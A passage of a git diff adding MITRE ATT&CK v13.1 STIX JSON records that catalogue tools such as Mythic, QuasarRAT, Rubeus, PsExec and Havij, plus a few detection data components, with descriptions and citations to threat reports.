"x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Cody Thomas, SpecterOps" + ], + "x_mitre_aliases": [ + "Mythic" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--d505fc8b-2e64-46eb-96d6-9ef7ffca5b66", + "created": "2022-03-26T01:38:12.966Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0699", + "url": "https://attack.mitre.org/software/S0699" + }, + { + "source_name": "RecordedFuture 2021 Ad Infra", + "url": "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "description": "Insikt Group. (2022, January 18). 2021 Adversary Infrastructure Report. Retrieved March 25, 2022." + }, + { + "source_name": "Mythic Github", + "url": "https://github.com/its-a-feature/Mythic", + "description": "Thomas, C. (2018, July 4). Mythic. Retrieved March 25, 2022." + }, + { + "source_name": "Mythic SpecterOps", + "url": "https://posts.specterops.io/a-change-of-mythic-proportions-21debeb03617", + "description": "Thomas, C. (2020, August 13). A Change of Mythic Proportions. Retrieved March 25, 2022." + }, + { + "source_name": "Mythc Documentation", + "url": "https://docs.mythic-c2.net/", + "description": "Thomas, C. (n.d.). Mythc Documentation. Retrieved March 25, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Mythic](https://attack.mitre.org/software/S0699) is an open source, cross-platform post-exploitation/command and control platform. [Mythic](https://attack.mitre.org/software/S0699) is designed to \"plug-n-play\" with various agents and communication channels.(Citation: Mythic Github)(Citation: Mythic SpecterOps)(Citation: Mythc Documentation) Deployed [Mythic](https://attack.mitre.org/software/S0699) C2 servers have been observed as part of potentially malicious infrastructure.(Citation: RecordedFuture 2021 Ad Infra)", + "modified": "2022-04-18T15:41:53.146Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mythic", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d5e96a35-7b0b-4c6a-9533-d63ecbda563e.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d5e96a35-7b0b-4c6a-9533-d63ecbda563e.json new file mode 100644 index 0000000000000000000000000000000000000000..7e763c7b1f70c8c0e0ec8244e5a058a997a17a03 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d5e96a35-7b0b-4c6a-9533-d63ecbda563e.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--5897bccb-367e-4dc6-9cfa-9428f9802592", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "HTRAN", + "HUC Packet Transmit Tool" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--d5e96a35-7b0b-4c6a-9533-d63ecbda563e", + "type": "tool", + "created": "2017-05-31T21:32:32.011Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0040", + "external_id": "S0040" + }, + { + "source_name": "HUC Packet Transmit Tool", + "description": "(Citation: Operation Quantum Entanglement)" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", + "description": "Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015.", + "source_name": "Operation Quantum Entanglement" + }, + { + "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.", + "url": "https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools", + "source_name": "NCSC Joint Report Public Tools" + } + ], + "modified": "2021-04-23T20:04:19.262Z", + "name": "HTRAN", + "description": "[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153.json new file mode 100644 index 0000000000000000000000000000000000000000..c32eef36ae6e8f41523bda2a25add67f6fafa5dd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--6c3e49c5-df78-445a-95c4-44f76fec28e1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "SDelete" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0195", + "external_id": "S0195" + }, + { + "source_name": "SDelete", + "description": "(Citation: Microsoft SDelete July 2016)" + }, + { + "source_name": "Microsoft SDelete July 2016", + "description": "Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.", + "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete" + } + ], + "modified": "2020-08-12T21:37:53.804Z", + "name": "SDelete", + "description": "[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--da04ac30-27da-4959-a67d-450ce47d9470.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--da04ac30-27da-4959-a67d-450ce47d9470.json new file mode 100644 index 0000000000000000000000000000000000000000..ccedf48fb5eabbb10fe0c5a119fb4be74619bc9e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--da04ac30-27da-4959-a67d-450ce47d9470.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--adb274d1-97a4-4d94-92ab-3aadc7ce8052", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "x_mitre_aliases": [ + "QuasarRAT", + "xRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--da04ac30-27da-4959-a67d-450ce47d9470", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0262", + "url": "https://attack.mitre.org/software/S0262" + }, + { + "source_name": "QuasarRAT", + "description": "(Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018) (Citation: TrendMicro Patchwork Dec 2017)" + }, + { + "source_name": "xRAT", + "description": "(Citation: TrendMicro Patchwork Dec 2017)(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "Securelist APT10 March 2021", + "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/", + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021." + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018." + }, + { + "source_name": "GitHub QuasarRAT", + "url": "https://github.com/quasar/QuasarRAT", + "description": "MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018." + }, + { + "source_name": "Volexity Patchwork June 2018", + "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)", + "modified": "2022-08-02T15:36:30.238Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "QuasarRAT", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--e33267fe-099f-4af2-8730-63d49f8813b2.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--e33267fe-099f-4af2-8730-63d49f8813b2.json new file mode 100644 index 0000000000000000000000000000000000000000..ae7e5558543f832cdcb6a03100f6ecee47323168 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--e33267fe-099f-4af2-8730-63d49f8813b2.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--8fd8c84f-2b90-426a-bdec-27772d070ae9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T23:27:32.465Z", + "name": "Rubeus", + "description": "[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Mayuresh Dani, Qualys", + "Akshat Pradhan, Qualys" + ], + "x_mitre_aliases": [ + "Rubeus" + ], + "type": "tool", + "id": "tool--e33267fe-099f-4af2-8730-63d49f8813b2", + "created": "2023-03-29T20:19:26.940Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1071", + "external_id": "S1071" + }, + { + "source_name": "GitHub Rubeus March 2023", + "description": "Harmj0y. (n.d.). Rubeus. Retrieved March 29, 2023.", + "url": "https://github.com/GhostPack/Rubeus" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68.json new file mode 100644 index 0000000000000000000000000000000000000000..fc65016e4f61126b6db91800dc41a14fecb5811a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--992cb0ee-03d3-492c-af95-cf930acc958b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-05T16:37:49.999Z", + "name": "Tor", + "description": "[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes \"Onion Routing,\" in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Tor" + ], + "type": "tool", + "id": "tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0183", + "external_id": "S0183" + }, + { + "source_name": "Tor", + "description": "(Citation: Dingledine Tor The Second-Generation Onion Router)" + }, + { + "source_name": "Dingledine Tor The Second-Generation Onion Router", + "description": "Roger Dingledine, Nick Mathewson and Paul Syverson. (2004). Tor: The Second-Generation Onion Router. Retrieved December 21, 2017.", + "url": "http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f59508a6-3615-47c3-b493-6676e1a39a87.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f59508a6-3615-47c3-b493-6676e1a39a87.json new file mode 100644 index 0000000000000000000000000000000000000000..bea2df66428dcd0d25cf6d342b0c589b1e252314 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f59508a6-3615-47c3-b493-6676e1a39a87.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--b639c4a7-b9f4-499a-bd62-2aa97461407a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-02T20:44:17.690Z", + "name": "AdFind", + "description": "[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "AdFind" + ], + "type": "tool", + "id": "tool--f59508a6-3615-47c3-b493-6676e1a39a87", + "created": "2020-12-28T18:35:50.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0552", + "external_id": "S0552" + }, + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/" + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a.json new file mode 100644 index 0000000000000000000000000000000000000000..03c447ba545ebe7eddacd6e18bb7731c2384f0b4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--174170c3-85f4-48d9-8967-02c85a79f687", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T17:45:16.377Z", + "name": "Wevtutil", + "description": "[Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Viren Chaudhari, Qualys", + "Harshal Tupsamudre, Qualys" + ], + "x_mitre_aliases": [ + "Wevtutil" + ], + "type": "tool", + "id": "tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a", + "created": "2021-09-14T21:45:30.280Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0645", + "external_id": "S0645" + }, + { + "source_name": "Wevtutil Microsoft Documentation", + "description": "Microsoft. (n.d.). wevtutil. Retrieved September 14, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5.json new file mode 100644 index 0000000000000000000000000000000000000000..dde00f9bae36569b69f8a196c3e82ab4df3c7ac1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--dee8a73a-df15-4d92-9871-fc55861b7f7d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0224", + "external_id": "S0224" + }, + { + "source_name": "Check Point Havij Analysis", + "description": "Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.", + "url": "https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Havij", + "description": "[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db.json new file mode 100644 index 0000000000000000000000000000000000000000..139606ed50882b5ec52f91ff4ae3a52f19d8576a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--218cbac8-5528-4b51-a6b8-3bc9811cd385", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-02T20:43:41.287Z", + "name": "PsExec", + "description": "[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_contributors": [ + "Janantha Marasinghe" + ], + "x_mitre_aliases": [ + "PsExec" + ], + "type": "tool", + "id": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "created": "2017-05-31T21:32:21.771Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0029", + "external_id": "S0029" + }, + { + "source_name": "SANS PsExec", + "description": "Pilkington, M. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.", + "url": "https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/" + }, + { + "source_name": "Russinovich Sysinternals", + "description": "Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--02d090b6-8157-48da-98a2-517f7edd49fc.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--02d090b6-8157-48da-98a2-517f7edd49fc.json new file mode 100644 index 0000000000000000000000000000000000000000..705559c53720d8da4bdd5b4e809add9168a1ed81 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--02d090b6-8157-48da-98a2-517f7edd49fc.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--f6d34ddd-cf38-402c-be0d-2a691a013485", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--02d090b6-8157-48da-98a2-517f7edd49fc", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Active Directory Credential Request", + "description": "A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769)", + "x_mitre_data_source_ref": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05645013-2fed-4066-8bdc-626b2e201dd4.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05645013-2fed-4066-8bdc-626b2e201dd4.json new file mode 100644 index 0000000000000000000000000000000000000000..dccdd662b963515b84e78d32db1462b04370da74 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05645013-2fed-4066-8bdc-626b2e201dd4.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--2072eae2-8174-451a-82b3-25f657817ac5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--05645013-2fed-4066-8bdc-626b2e201dd4", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "WMI Creation", + "description": "Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)", + "x_mitre_data_source_ref": "x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05d5b5b4-ef93-4807-b05f-33d8c5a35bc5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05d5b5b4-ef93-4807-b05f-33d8c5a35bc5.json new file mode 100644 index 0000000000000000000000000000000000000000..3afbc0db9c294b2c29f100fb2449520ac30c19e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05d5b5b4-ef93-4807-b05f-33d8c5a35bc5.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--de9d9598-54a5-4f3b-b607-034b6f0534f9", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--05d5b5b4-ef93-4807-b05f-33d8c5a35bc5", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Group Modification", + "description": "Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup)", + "x_mitre_data_source_ref": "x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963.json 